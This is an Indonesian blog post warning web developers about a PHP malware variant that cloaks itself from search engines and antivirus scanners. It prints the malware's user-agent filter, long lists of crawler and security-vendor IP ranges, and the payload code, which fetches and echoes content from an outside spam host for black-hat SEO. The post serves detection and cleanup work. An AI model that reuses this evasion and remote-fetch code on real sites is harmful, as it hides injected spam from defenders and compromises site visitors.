Keamanan Sistem

WASPADA! Identifikasi variasi kode malware

Saat ini banyak sekali varian malware. Mungkin anda juga pernah mendapat serangan sehingga website anda terjangkit malware dan terblok oleh browser karena dianggap berbahaya.

Kode-kode malware dan prosesnya semakin berkembang menjadi sangat rumit. Bagi anda paraweb programmer, anda wajib mengerti bagaimana cara mengamankan sistem dari serangan malware ini. Pembuatan kode program yang buruk akan menjadi sasaran empuk bagi malware.

Malware biasanya erat kaitannya dengan hacking dan trojan. Skrip Malware dibuat sedemikian rupa sehingga dapat menginfeksi jika suatu kondisi terpenuhi. Dengan dibantu trojan, mereka dapat menginfeksi dari satu sistem ke sistem lainnya secara otomatis.

Dalam artikel berikut, mari kita amati beberapa komponen yang salah satunya mungkin pernah anda temukan dalam website yang terinfeksi malware. Berhati-hatilah dan tetap waspada dengan kode-kode aneh yang mungkin anda temukan dalam skrip website anda sehingga anda dapat terhindar dari infeksi malware yang dapat merajalela.

Mari kita mulai membedah kode.

1. User Agents

Ini adalah hal pertama yang perlu anda ketahui. Penggunaan kode $user_agent_to_filter dalam skrip PHP perlu anda curigai. Ini bisa berarti bahwa kode malware akan tampil jika pengunjung berasal dari salah satu dari User Agents yang ada dalam daftar kode $user_agent_to_filter.

Berikut Contoh User Agents yang ada dalam skrip infeksi malware.

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#Googlebot#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i' ) ;

2. Filter IP
Masalah kode berikutnya berhubungan dengan daftar alamat IP panjang yang ditulis dengansistem ReGex (Regular Expression). Jika anda menemukan satu atau lebih daftar kode IP yang mirip atau bahkan sama dengan kode ini, WASPADALAH!!!

Jika alamat IP pengunjung web masuk ke dalam rentang IP dalam skrip atau bahkan sama dengan IP yang ada pada kode, maka akan terjadi tindakan khusus. Ini menyatakan bahwa skrip ini dibuat dengan baik untuk dapat menghindari Mesin Pencari (Search Engine) juga AntiVirus.

Berikut adalah daftar IP yang telah diidentifikasi oleh situs sucuri.net

$stop_ips_masks = array(
“66\.249\.[6-9][0-9]\.[0-9]+”, // Google NetRange: 66.249.64.0 – 66.249.95.255
“74\.125\.[0-9]+\.[0-9]+”, // Google NetRange: 74.125.0.0 – 74.125.255.255
“65\.5[2-5]\.[0-9]+\.[0-9]+”, // MSN NetRange: 65.52.0.0 – 65.55.255.255,
“74\.6\.[0-9]+\.[0-9]+”, // Yahoo NetRange: 74.6.0.0 – 74.6.255.255
“67\.195\.[0-9]+\.[0-9]+”, // Yahoo#2 NetRange: 67.195.0.0 – 67.195.255.255
“72\.30\.[0-9]+\.[0-9]+”, // Yahoo#3 NetRange: 72.30.0.0 – 72.30.255.255
“38\.[0-9]+\.[0-9]+\.[0-9]+”, // Cuill: NetRange: 38.0.0.0 – 38.255.255.255
“93\.172\.94\.227″, // MacFinder
“212\.100\.250\.218″, // Wells Search II
“128\.103\.64\.[0-9]+”, // StopBadWare
“150\.70\.[0-9]+\.[0-9]+”, // TrendMicro
“216\.104\.[0-9]+\.[0-9]+”, // TrendMicro
“207\.46\.[0-9]+\.[0-9]+”, // Microsoft
“157\.55\.[0-9]+\.[0-9]+”, // Microsoft
“213\.180\.[0-9]+\.[0-9]+”, // Yandex
“217\.23\.[0-9]+\.[0-9]+”, // Kaspersky
“91\.103\.64\.[0-9]+”, // Kaspersky
“215\.5\.80\.[0-9]+”, // Kaspersky
“195\.168\.53\.[0-9]+”, // NOD32
“220\.255\.1\.[0-9]+”, // domain-tool.com
“69\.28\.58\.[0-9]+”, // Symantec
“66\.147\.244\.[0-9]+”, // freepcsecurity.co.uk
“128\.111\.48\.[0-9]+”, // wepawet.cs.ucsb.edu
“209\.9\.239\.[0-9]+”, // jsunpack.jeek.org
“62\.67\.194\.[0-9]+”, // support.clean-mx.de
“195\.214\.79\.[0-9]+”, // support.clean-mx.de
“97\.74\.141\.[0-9]+”, // malwareurl.com
“213\.171\.194\.[0-9]+”, // spamhaus
“139\.146\.167\.[0-9]+”, // malwaredomains
“88\.160\.229\.[0-9]+”, // malwaredomains
“69\.162\.79\.[0-9]+”, // malwarebytes
“66\.40\.145\.[0-9]+”, // bitdefender
“66\.223\.50\.[0-9]+”, // bitdefender
“204\.14\.90\.[0-9]+”, // spywarewarrior.com
“92\.123\.155\.[0-9]+”, // Sophos
“213\.31\.172\.[0-9]+”, // Sophos
“143\.215\.130\.[0-9]+”, // Malwaredomainlist
“150\.70\.172\.[0-9]+”, // TrendNet
“64\.88\.164\.[0-9]+”, // AVG
“102\.157\.192\.[0-9]+”, // ZeusTracker
“109\.65\.41\.[0-9]+”, // ZeusTracker
“110\.77\.248\.[0-9]+”, // Virustotal
“59\.6\.145\.[0-9]+”, // Virustotal
“67\.124\.37\.[0-9]+”, // Virustotal

Berikut adalah alamat IP yang saya temukan sendiri dari website klien yang memanfaatkan jasa layanan pembersihan malware dari saya.

$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+",
"74\.125\.[0-9]+\.[0-9]+",
"65\.5[2-5]\.[0-9]+\.[0-9]+",
"74\.6\.[0-9]+\.[0-9]+",
"67\.195\.[0-9]+\.[0-9]+",
"72\.30\.[0-9]+\.[0-9]+",
"38\.[0-9]+\.[0-9]+\.[0-9]+",
"93\.172\.94\.227",
"212\.100\.250\.218",
"71\.165\.223\.134",
"70\.91\.180\.25",
"65\.93\.62\.242", "74\.193\.246\.129", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "204\.152\.235\.219", "203\.116\.59\.28", "194\.176\.105\.47", "203\.81\.166\.6", "130\.138\.227\.40", "192\.75\.88\.232", "144\.29\.129\.16", "216\.104\.15\.142", "216\.104\.15\.130", "193\.113\.57\.165", "20\.133\.0\.13", "220\.255\.4\.29", "80\.254\.147\.124", "150\.70\.84\.45", "157\.203\.243\.19", "139\.48\.25\.61", "199\.91\.34\.33", "205\.128\.224\.6", "137\.242\.1\.50", "12\.188\.154\.180", "132\.1\.207\.22", "190\.24\.146\.71", "152\.114\.1\.10", "161\.185\.157\.23", "65\.214\.169\.254", "220\.255\.4\.28", "194\.175\.243\.100", "81\.134\.198\.71", "216\.104\.15\.134", "205\.200\.189\.2", "217\.111\.75\.13", "195\.229\.235\.38", "155\.94\.70\.222", "12\.41\.25\.219", "165\.72\.200\.11", "137\.201\.242\.130", "64\.213\.130\.198", "207\.245\.58\.40", "217\.171\.129\.71", "71\.132\.211\.133", "99\.31\.235\.208", "216\.227\.248\.201", "190\.69\.3\.2", "220\.255\.4\.30", "99\.31\.232\.162", "160\.109\.63\.190", "216\.104\.15\.138", "199\.172\.169\.17", "170\.153\.62\.251", "198\.208\.159\.17", "148\.184\.174\.62", "20\.137\.18\.52", "72\.28\.46\.99", "206\.230\.48\.50", "216\.113\.168\.136", "65\.219\.124\.65", "217\.171\.129\.74", "129\.176\.151\.24", "170\.194\.32\.58", "167\.24\.104\.150", "142\.213\.176\.140", "91\.103\.41\.50", "208\.65\.192\.1", "194\.60\.85\.4", "71\.132\.208\.172", "204\.94\.163\.36", "138\.103\.17\.18", "205\.228\.53\.11", "147\.239\.6\.10", "65\.245\.23\.130", "216\.113\.168\.139", "207\.236\.93\.201", "208\.31\.155\.254", "119\.31\.121\.9", "217\.171\.129\.73", "34\.254\.119\.222", "194\.74\.238\.6", "15\.203\.233\.76", "92\.251\.255\.11", "15\.203\.169\.105", "12\.43\.88\.121", "169\.252\.4\.21", "192\.109\.190\.88", "199\.212\.250\.95", "130\.76\.96\.16", "220\.255\.4\.26", "195\.229\.242\.55", "77\.72\.8\.27", "162\.96\.105\.83", "210\.55\.215\.156", "207\.163\.116\.20", "38\.99\.162\.162", "210\.55\.215\.155", "208\.66\.124\.31", "162\.53\.36\.90", "15\.195\.201\.88", "216\.13\.39\.93", "217\.171\.129\.69", "70\.168\.46\.161", "193\.49\.123\.22", "99\.35\.220\.184", "192\.193\.171\.215", "62\.60\.98\.133", "193\.131\.2\.153", "204\.50\.7\.200", "65\.112\.250\.245", "66\.7\.132\.34", "66\.193\.18\.4", "65\.198\.97\.30", "171\.159\.64\.10", "15\.203\.169\.106", "170\.35\.208\.20", "129\.53\.219\.20", "204\.50\.113\.43", "192\.43\.65\.245", "162\.71\.241\.254", "149\.101\.1\.127", "12\.34\.246\.79", "99\.159\.46\.251", "63\.119\.90\.5", "160\.134\.5\.27", "165\.89\.84\.90", "208\.38\.52\.98", "139\.142\.154\.129", "217\.171\.129\.70", "142\.245\.193\.11", "217\.171\.129\.68", "194\.75\.224\.98", "150\.192\.0\.4", "195\.92\.101\.11", "92\.251\.255\.17", "192\.206\.181\.61", "63\.236\.248\.195", "199\.22\.57\.2", "15\.251\.169\.70", "92\.251\.255\.12", "13\.8\.137\.10", "192\.193\.171\.151", "205\.239\.196\.6", "192\.35\.35\.34", "92\.251\.255\.15", "62\.172\.185\.126", "63\.76\.234\.250", "12\.43\.88\.120", "217\.169\.229\.153", "80\.194\.86\.146", "62\.6\.242\.122", "20\.139\.35\.50", "194\.105\.160\.193", "99\.159\.44\.70", "200\.77\.230\.68", "204\.99\.19\.150", "203\.111\.83\.85", "199\.91\.37\.33", "71\.132\.207\.103", "203\.120\.199\.231", "153\.48\.52\.241", "203\.126\.136\.142", "218\.213\.12\.43", "65\.210\.59\.130", "203\.161\.181\.4", "199\.64\.0\.252", "124\.215\.201\.5", "147\.60\.1\.230", "71\.132\.195\.234", "85\.158\.139\.100", "99\.159\.47\.100", "203\.116\.231\.234", "140\.168\.129\.177", "152\.226\.7\.201", "203\.98\.50\.27", "220\.255\.4\.27", "15\.219\.233\.70", "204\.248\.39\.11", "192\.193\.1\.5", "15\.219\.153\.73", "192\.193\.171\.152", "203\.117\.177\.98", "150\.70\.84\.172", "199\.63\.142\.252", "194\.6\.79\.200", "166\.121\.36\.10", "166\.121\.37\.12", "15\.211\.153\.73", "196\.29\.161\.81", "203\.169\.63\.1", "167\.94\.2\.15", "170\.232\.128\.10", "203\.127\.182\.12", "192\.55\.54\.38", "192\.193\.171\.216", "192\.55\.54\.37", "213\.71\.21\.203", "194\.176\.125\.6", "192\.55\.54\.36", "192\.249\.41\.3", "203\.127\.116\.93", "20\.139\.250\.201", "153\.20\.24\.67", "165\.21\.7\.137", "211\.75\.90\.103", "203\.117\.19\.195", "193\.113\.48\.7", "203\.112\.84\.139", "203\.131\.236\.195", "192\.196\.142\.21", "194\.151\.80\.131", "193\.108\.73\.47", "166\.121\.37\.11", "64\.215\.209\.1", "192\.55\.54\.39", "217\.77\.224\.129", "202\.161\.43\.233", "92\.43\.67\.35", "132\.19\.75\.25", "212\.123\.4\.114", "194\.216\.126\.14", "52\.129\.32\.50", "202\.12\.95\.12", "203\.120\.207\.10", "86\.96\.228\.91", "212\.157\.112\.24", "203\.127\.116\.131", "195\.173\.213\.33", "195\.246\.108\.11", "150\.70\.84\.171", "218\.188\.93\.140", "198\.240\.212\.2", "124\.124\.219\.250", "130\.138\.227\.11", "193\.113\.57\.167", "217\.169\.229\.154", "118\.168\.70\.120", "203\.98\.50\.26", "144\.57\.128\.14", "137\.191\.236\.66", "212\.1\.25\.254", "155\.69\.2\.5", "198\.240\.133\.75", "15\.211\.153\.75", "85\.92\.209\.135", "145\.62\.32\.129", "82\.0\.83\.150", "213\.212\.75\.70", "194\.192\.22\.33", "149\.55\.30\.100", "203\.112\.90\.136", "213\.217\.40\.132", "62\.25\.109\.195", "195\.92\.40\.49", "80\.113\.168\.25", "20\.133\.40\.13", "192\.91\.147\.35", "20\.138\.246\.89", "62\.172\.191\.68", "137\.9\.121\.123", "212\.217\.115\.22", "85\.112\.95\.11", "212\.189\.46\.155", "84\.241\.248\.37", "193\.113\.57\.161", "41\.222\.169\.92", "192\.41\.140\.2", "143\.252\.80\.100", "212\.190\.93\.60", "193\.191\.219\.80", "144\.230\.63\.57", "113\.29\.248\.7", "12\.149\.100\.21", "81\.144\.233\.234", "167\.225\.107\.17", "162\.116\.29\.69", "66\.162\.239\.134", "213\.94\.227\.162", "206\.213\.209\.31", "12\.191\.136\.2", "194\.237\.142\.6", "143\.52\.5\.10", "164\.140\.155\.143", "192\.138\.70\.245", "142\.203\.1\.9", "198\.24\.5\.12", "149\.32\.192\.34", "169\.145\.3\.21", "195\.229\.242\.58", "170\.252\.59\.221", "217\.33\.241\.212", "198\.50\.63\.15", "63\.240\.123\.12", "140\.153\.203\.4", "63\.69\.68\.5", "192\.31\.106\.34", "12\.2\.142\.13", "193\.41\.37\.3", "15\.195\.201\.87", "194\.29\.71\.96", "199\.173\.226\.235", "158\.169\.9\.14", "138\.32\.254\.21", "63\.117\.229\.201", "13\.8\.137\.11", "199\.198\.251\.108", "88\.148\.164\.100", "65\.217\.164\.226", "137\.240\.136\.69", "12\.237\.71\.86", "149\.128\.8\.245", "196\.3\.51\.241", "83\.137\.143\.38", "208\.73\.177\.89", "137\.191\.240\.98", "92\.251\.255\.14", "194\.237\.142\.17", "138\.62\.101\.134", "130\.138\.227\.41", "66\.60\.245\.44", "194\.74\.230\.222", "156\.75\.180\.198", "155\.140\.133\.56", "216\.189\.254\.200", "192\.172\.8\.13", "204\.139\.85\.158", "129\.61\.46\.60", "198\.208\.243\.250", "202\.50\.49\.16", "13\.20\.137\.12", "193\.28\.194\.11", "195\.27\.12\.230", "165\.170\.128\.65", "201\.7\.114\.130", "86\.96\.229\.92", "15\.195\.201\.89", "155\.140\.133\.57", "161\.74\.11\.26", "192\.189\.58\.2", "159\.53\.46\.147", "192\.91\.173\.42", "80\.0\.251\.1", "159\.245\.16\.100", "161\.162\.4\.23", "15\.203\.137\.70", "205\.254\.147\.8", "155\.104\.37\.18", "200\.228\.254\.170", "12\.47\.208\.50", "62\.8\.119\.227", "167\.202\.201\.4", "201\.7\.114\.238", "137\.242\.1\.15", "168\.137\.100\.23", "206\.45\.208\.11", "199\.173\.226\.229", "164\.128\.123\.50", "15\.195\.201\.91", "131\.53\.128\.33", "83\.244\.222\.194", "192\.91\.171\.36", "20\.132\.68\.147", "192\.35\.35\.35", "200\.179\.65\.110", "193\.113\.37\.9", "198\.204\.105\.200", "193\.1\.229\.15", "201\.54\.111\.242", "99\.25\.118\.180", "201\.54\.111\.250", "195\.166\.116\.237", "200\.157\.150\.2", "146\.243\.4\.157", "198\.169\.189\.225", "62\.189\.127\.13", "167\.230\.38\.118", "12\.47\.205\.126", "193\.244\.33\.47", "200\.157\.150\.28", "162\.53\.103\.225", "192\.54\.193\.27", "161\.49\.249\.254", "207\.195\.39\.190", "12\.47\.208\.34", "192\.165\.213\.18", "200\.157\.150\.1", "205\.166\.218\.66", "67\.53\.233\.69", "142\.245\.193\.10", "12\.171\.160\.202", "170\.146\.225\.4", "216\.158\.5\.4", "216\.143\.179\.8", "164\.11\.204\.57", "204\.78\.125\.47", "201\.7\.114\.129", "222\.127\.223\.75", "161\.150\.2\.58", "204\.248\.24\.163", "200\.179\.65\.2", "206\.213\.251\.31", "62\.60\.98\.134", "65\.91\.147\.148", "130\.76\.64\.14", "66\.46\.138\.11", "130\.221\.224\.7", "209\.116\.12\.14", "199\.89\.103\.11", "168\.11\.96\.76", "208\.12\.121\.254", "15\.219\.153\.74", "142\.245\.59\.9", "158\.145\.224\.33", "12\.178\.36\.25", "209\.133\.116\.20", "206\.210\.27\.33", "24\.213\.67\.178", "200\.179\.65\.1", "205\.228\.53\.13", "63\.77\.247\.10", "204\.209\.24\.2", "200\.186\.13\.158", "62\.134\.46\.4", "206\.210\.17\.33", "64\.47\.54\.5", "13\.13\.137\.1", "138\.162\.8\.58", "142\.213\.176\.78", "209\.191\.246\.3", "198\.208\.251\.24", "166\.68\.134\.174", "206\.186\.37\.200", "12\.1\.219\.177", "170\.201\.180\.136", "162\.119\.68\.248", "15\.203\.233\.79", "12\.34\.95\.126", "15\.203\.137\.73", "144\.15\.222\.100", "74\.92\.157\.70", "129\.192\.170\.250", "139\.177\.225\.120", "65\.202\.26\.176", "206\.130\.174\.42", "205\.210\.223\.133", "207\.35\.6\.2", "204\.101\.27\.98", "198\.133\.214\.11", "192\.139\.217\.22", "15\.219\.153\.76", "192\.75\.88\.231", "141\.228\.106\.151", "202\.129\.234\.207", "64\.191\.211\.55", "208\.69\.196\.2", "139\.173\.54\.11", "161\.80\.10\.20", "148\.168\.127\.10", "66\.207\.113\.110", "152\.120\.255\.251", "199\.198\.251\.106", "192\.100\.70\.213", "203\.98\.50\.23", "217\.77\.225\.130", "205\.166\.218\.69", "194\.237\.142\.7", "75\.141\.184\.3", "205\.132\.119\.8", "130\.76\.32\.144", "92\.251\.255\.18", "63\.216\.59\.226", "209\.7\.13\.194", "65\.241\.18\.25", "140\.163\.248\.2", "151\.166\.15\.115", "198\.84\.16\.9", "129\.176\.151\.28", "192\.172\.14\.99", "165\.12\.252\.113", "12\.41\.204\.3", "129\.61\.46\.16", "132\.200\.32\.34", "199\.173\.224\.32", "56\.0\.84\.23", "159\.10\.134\.170", "134\.134\.139\.73", "62\.215\.3\.69", "132\.228\.195\.207", "12\.54\.128\.7", "171\.159\.192\.10", "194\.203\.84\.229", "204\.98\.2\.165", "129\.188\.33\.27", "217\.171\.129\.72", "204\.248\.24\.165", "69\.158\.225\.229", "193\.113\.48\.17", "169\.139\.185\.1", "158\.230\.100\.102", "138\.32\.236\.2", "64\.25\.25\.7", "12\.34\.246\.78", "204\.248\.24\.164", "138\.162\.0\.44", "199\.89\.103\.13", "162\.139\.5\.35", "144\.230\.191\.36", "92\.251\.255\.16", "214\.13\.168\.77", "15\.211\.169\.106", "66\.194\.2\.9", "159\.83\.252\.230", "12\.165\.139\.33", "86\.96\.227\.87", "207\.117\.33\.135", "15\.203\.233\.77", "99\.197\.128\.56", "206\.16\.32\.136", "203\.26\.122\.12", "150\.70\.84\.49", "199\.67\.131\.148", "170\.232\.192\.10", "61\.14\.95\.129", "200\.220\.188\.67", "203\.31\.24\.53", "166\.121\.36\.12", "134\.159\.131\.34", "210\.9\.200\.35", "134\.134\.139\.72", "213\.61\.87\.197", "135\.214\.40\.21", "162\.119\.238\.161", "210\.132\.120\.130", "203\.127\.190\.12", "203\.0\.223\.244", "203\.125\.178\.67", "61\.14\.94\.2", "202\.3\.241\.20", "203\.116\.34\.142", "198\.208\.159\.19", "206\.182\.164\.12", "147\.238\.8\.16", "192\.19\.195\.82", "203\.126\.214\.170", "135\.214\.42\.30", "152\.226\.7\.202", "134\.159\.107\.12", "203\.116\.208\.9", "203\.127\.17\.10", "198\.36\.40\.2", "204\.254\.175\.249", "198\.185\.18\.207", "141\.228\.250\.141", "61\.246\.61\.4", "217\.69\.176\.39", "62\.129\.121\.62", "205\.156\.180\.229", "202\.179\.97\.113", "203\.126\.183\.27", "219\.142\.122\.100", "194\.74\.184\.242", "203\.117\.9\.201", "203\.126\.241\.7", "152\.226\.181\.152", "195\.145\.196\.26", "162\.96\.105\.84", "193\.134\.254\.25", "86\.96\.228\.93", "195\.229\.237\.36", "193\.123\.251\.30", "62\.189\.70\.121", "193\.117\.31\.2", "199\.40\.204\.245", "124\.66\.129\.166", "192\.28\.0\.21", "121\.100\.39\.83", "217\.22\.0\.164", "149\.171\.184\.122", "213\.143\.133\.213", "194\.127\.8\.18", "205\.228\.82\.139", "193\.110\.130\.103", "202\.46\.116\.230", "213\.31\.11\.24", "196\.46\.58\.21", "217\.33\.150\.4", "214\.13\.35\.169", "213\.146\.148\.72", "203\.121\.90\.154", "198\.241\.217\.15", "195\.229\.236\.218", "85\.91\.175\.221", "83\.100\.214\.97", "121\.100\.39\.81", "65\.216\.138\.253", "203\.117\.9\.202", "193\.39\.158\.203", "192\.193\.164\.8", "193\.195\.84\.178", "193\.29\.77\.101", "213\.48\.94\.65", "15\.203\.233\.80", "203\.127\.9\.138", "203\.117\.92\.2", "213\.152\.235\.126", "83\.100\.136\.99", "86\.51\.34\.39", "20\.133\.0\.8", "193\.82\.153\.194", "155\.56\.68\.215", "195\.229\.236\.213", "138\.227\.189\.8", "155\.140\.255\.119", "155\.56\.68\.216", "199\.166\.15\.229", "170\.194\.32\.42", "155\.140\.255\.215", "194\.237\.142\.20", "217\.33\.154\.234", "212\.219\.249\.5", "147\.114\.226\.194", "217\.169\.130\.10", "80\.193\.69\.13", "192\.100\.124\.219", "87\.236\.105\.23", "63\.78\.242\.14", "193\.35\.10\.55", "195\.229\.236\.214", "153\.100\.131\.14", "194\.168\.45\.250", "141\.6\.11\.16", "62\.6\.155\.83", "193\.113\.48\.11", "80\.169\.201\.147", "64\.208\.159\.230", "212\.41\.142\.201", "194\.232\.72\.121", "203\.126\.56\.6", "193\.191\.138\.240", "217\.196\.231\.122", "192\.109\.140\.34", "209\.202\.107\.203", "212\.217\.100\.186", "194\.72\.35\.118", "160\.96\.200\.36", "160\.96\.200\.35", "141\.194\.10\.62", "204\.248\.24\.162", "86\.96\.228\.84", "195\.99\.173\.190", "134\.226\.1\.234", "138\.227\.189\.9", "212\.190\.69\.84", "80\.121\.154\.197", "217\.117\.205\.182", "170\.252\.248\.203", "156\.25\.4\.2", "212\.39\.192\.3", "193\.252\.174\.216", "62\.96\.241\.100", "193\.9\.254\.100", "199\.64\.72\.252", "170\.148\.215\.156", "212\.28\.240\.148", "195\.242\.224\.17", "193\.251\.40\.96", "147\.114\.226\.182", "199\.173\.225\.33", "194\.202\.213\.254", "158\.169\.131\.14", "195\.160\.149\.37", "147\.114\.226\.180", "217\.169\.45\.170", "192\.193\.245\.15", "167\.21\.254\.12", "217\.110\.62\.222", "195\.27\.20\.2", "199\.172\.169\.32", "12\.53\.132\.4", "86\.96\.227\.86", "198\.36\.87\.87", "165\.89\.84\.86", "12\.220\.224\.66", "171\.159\.194\.10", "78\.100\.4\.41", "205\.174\.8\.4", "193\.203\.192\.15", "193\.251\.64\.186", "155\.94\.110\.223", "63\.65\.166\.138", "88\.211\.192\.151", "213\.219\.63\.254", "216\.46\.98\.249", "84\.235\.126\.239", "192\.122\.250\.250", "12\.31\.202\.42", "142\.21\.15\.116", "70\.41\.64\.58", "13\.17\.125\.8", "205\.228\.53\.12", "199\.207\.253\.101", "12\.34\.246\.80", "207\.164\.58\.11", "194\.60\.38\.10", "34\.253\.3\.201", "208\.201\.160\.2", "150\.113\.8\.138", "208\.65\.40\.97", "87\.194\.175\.231", "163\.161\.16\.161", "141\.228\.250\.142", "205\.166\.218\.70", "141\.228\.106\.150", "169\.200\.80\.16", "38\.100\.76\.235", "15\.195\.201\.90", "217\.167\.147\.251", "64\.20\.168\.21", "171\.159\.194\.11", "206\.196\.241\.19", "217\.128\.236\.119", "83\.244\.197\.164", "142\.21\.15\.117", "141\.228\.106\.148", "24\.153\.172\.130", "195\.220\.245\.1", "204\.54\.36\.245", "195\.28\.224\.59", "212\.240\.180\.118", "139\.149\.31\.230", "142\.163\.56\.186", "80\.94\.32\.93", "138\.32\.235\.36", "141\.228\.106\.147", "170\.35\.224\.63", "204\.17\.150\.48", "86\.96\.226\.90", "157\.127\.124\.15", "161\.185\.157\.22", "159\.53\.110\.140", "66\.150\.88\.227", "217\.10\.95\.68", "169\.241\.28\.193", "156\.146\.1\.201", "165\.130\.136\.206", "143\.79\.13\.6", "204\.75\.80\.174", "12\.6\.145\.178", "12\.4\.26\.248", "165\.130\.136\.208", "83\.136\.72\.5", "216\.226\.180\.2", "131\.44\.121\.21", "128\.130\.56\.23", "15\.219\.153\.80", "158\.48\.6\.139", "134\.134\.139\.70", "169\.241\.1\.75", "67\.111\.140\.129", "199\.67\.138\.43", "216\.226\.180\.3", "205\.156\.136\.229", "63\.95\.36\.13", "216\.26\.88\.80", "192\.188\.205\.194", "128\.190\.125\.2", "65\.200\.157\.178", "187\.141\.12\.30", "208\.18\.15\.6", "12\.129\.97\.254", "213\.31\.195\.90", "207\.157\.9\.169", "195\.213\.180\.120", "199\.31\.3\.196", "193\.95\.170\.99", "194\.203\.158\.97", "146\.209\.130\.2", "194\.60\.38\.198", "192\.234\.99\.1", "162\.106\.6\.3", "137\.240\.136\.70", "206\.130\.173\.55", "62\.161\.157\.220", "148\.236\.5\.92", "199\.198\.223\.106", "195\.229\.242\.59", "129\.188\.33\.26", "86\.96\.226\.93", "199\.67\.131\.152", "146\.209\.130\.211", "65\.211\.126\.14", "169\.200\.80\.17", "199\.172\.169\.21", "205\.228\.82\.171", "140\.139\.35\.250", "199\.169\.204\.4", "193\.188\.105\.20", "8\.7\.228\.252", "208\.35\.38\.11", "132\.49\.221\.25", "12\.11\.0\.247", "204\.89\.74\.136", "160\.84\.254\.241", "38\.112\.12\.110", "57\.77\.11\.4", "130\.20\.188\.48", "20\.137\.18\.53", "192\.138\.205\.144", "161\.162\.4\.24", "204\.104\.55\.244", "147\.114\.226\.193", "75\.151\.7\.189", "160\.133\.1\.228", "210\.143\.35\.12", "204\.152\.239\.219", "170\.93\.140\.42",
"66\.249\.[6-9][0-9]\.[0-9]+",
"70\.91\.180\.25",
"65\.5[2-5]\.[0-9]+\.[0-9]+",
"74\.6\.[0-9]+\.[0-9]+",
"178\.158\.214\.36",
"67\.195\.[0-9]+\.[0-9]+");

Cara Kerja Malware.
a. Jika kondisi terpenuhi, maka…
Ketika IP pengunjung memenuhi syarat atau cocok dengan daftar IP dalam skrip tersebut, mereka akan diarahkan (redirect) ke alamat tertentu untuk meningkatkan rangking SERP mereka dimata mesin pencari. Ini adalah BlackHat SEO!!!

b. Jika kondisi tidak terpenuhi, maka…
Ketika alamat IP pengunjung tidak memenuhi syarat atau tidak cocok dengan daftar IP dalam skrip tersebut, mereka akan diarahkan ke web kita sendiri.

Inilah yang menjadikan website yang terinfeksi malware mempunyai kesulitan bertingkat untuk dapat dicek melalui HTTP browser.

Kode Program Malware

$is_bot = FALSE ;
foreach ( $stop_ips_masks as $k=>$v )
{
if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) ) $is_bot = TRUE ;
}
$xxxx1 = preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] );
if(strpos( $xxxx1, '-NO-WAY-' )) {
$is_bot = TRUE;
}

if($is_bot) {
$isboturl = "http://familyy-history.com/link8/show.php?h=".$_SERVER['HTTP_HOST']."&m=".md5($_SERVER['REQUEST_URI']);
if(@function_exists("curl_init")) {
$actualUpdate = @curl_init($isboturl);
@curl_setopt($actualUpdate, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($actualUpdate, CURLOPT_TIMEOUT, 15);
@curl_setopt($actualUpdate, CURLOPT_HEADER, 0);
$actualResult = @curl_exec($actualUpdate);
$actualResultCode = @curl_getinfo($actualUpdate, CURLINFO_HTTP_CODE);
@curl_close($actualUpdate);
if($actualResultCode == 200) {echo $actualResult;}}
elseif(@ini_get("allow_url_fopen") == 1) {echo @file_get_contents($isboturl);}

}

Kemungkinan hasil akhir ini berbeda. Informasi dari website sucuri menyebutkan kebalikannya.
Semoga informasi ini dapat membantu kita agar lebih waspada dari serangan malware ini.

Salam Sukses,
Aditif.Net

One Comment

Post Comment